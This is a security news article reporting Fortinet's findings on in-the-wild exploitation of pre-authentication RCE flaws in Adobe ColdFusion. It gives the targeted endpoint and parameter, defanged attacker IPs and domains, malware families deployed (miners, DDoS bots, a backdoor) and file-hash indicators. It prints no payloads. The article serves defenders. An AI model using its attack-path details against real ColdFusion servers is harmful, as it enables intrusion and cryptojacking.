Hackers Exploit Pre-Authentication RCE Vulnerabilities in Adobe ColdFusion

Adobe ColdFusion is a Java-based, commercial web app development platform using CFML for server-side programming.

ColdFusion is primarily known for its tag-based approach, which is unique. Besides this, it is also popular among developers for its adaptability across various industries.

The cybersecurity researchers at Fortinet recently uncoverd that Windows and macOS users face risk from Adobe ColdFusion vulnerabilities, targeted by remote attackers for pre-authentication RCE exploits.

Technical Analysis

Hackers target the URI ‘/CFIDE/adminapi/accessmanager.cfc,’ injecting payloads via a POST request into the ‘argumentCollection’ parameter.

By using the interactsh tool, researchers spotted probing activities in July. While this tool generates domain names for testing exploits and monitoring vulnerabilities.

Attacker’s webpage at different times on 8/24

Threat actors can misuse it to validate the vulnerabilities by monitoring the domains, and here are the related domains collected by security experts:-

  • mooo-ng[.]com
  • redteam[.]tf
  • h4ck4fun[.]xyz

Probing activities involving other domains (Source – Fortinet)

Attackers employ reverse shells for exploiting system vulnerabilities, like in Adobe ColdFusion, using Base64-encoded payloads.

It’s been identified that from several IP addresses, all these attacks originated, and here below we have mentioned them:-

  • 81[.]68[.]214[.]122
  • 81[.]68[.]197[.]3
  • 82[.]156[.]147[.]183

The malware was distributed from a publicly accessible HTTP file server:-

  • 103[.]255[.]177[.]55[:]6895

Malware Variants

Here below, we have mentioned all the malware variants that the security analyst discovered:

  • XMRig Miner: It’s a software program that uses CPU cycles for Monero mining for both legitimate and malicious purposes.
  • DDoS/Lucifer: It’s a hybrid bot with cryptojacking, DDoS, C2, vulnerability exploitation, and DDoS capabilities, which was reported in 2020.
  • RudeMiner: It’s also a hybrid version of a malware bot that targets the crypto wallet and carries out DDoS attacks.
  • BillGates/Setag: This backdoor version is mainly known for hijacking, C2 server communication, and attacks. However, in this scenario, through the checking procedure with the file “bill.lock,” this malware could be detected.

Researchers have been monitoring this flaw for weeks and have seen many attacks against Adobe ColdFusion. They continue to be exploited in the wild despite introducing fixes to address these flaws. Users should upgrade affected systems to prevent threat probing.

IoCs

Attacker’s IP Address:

  • 81[.]68[.]214[.]122
  • 81[.]68[.]197[.]3
  • 82[.]156[.]147[.]183

Malware Server’s IP Address:

  • 103[.]255[.]177[.]55:6895

Files:

  • 7c6f0bae1e588821bd5d66cd98f52b7005e054279748c2c851647097fa2ae2df
  • 590d3088ed566cb3d85d48f4914cc657ee49b7d33e85c72167e7c72d81d4cb6c
  • 808f0f85aee6be3d3f3dd4bb827f556401c4d69a642ba4b1cb3645368954622e
  • 4f22fea4d0fadd2e01139021f98f04d3cae678e6526feb61fa8a6eceda13296a
Guru Baran
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.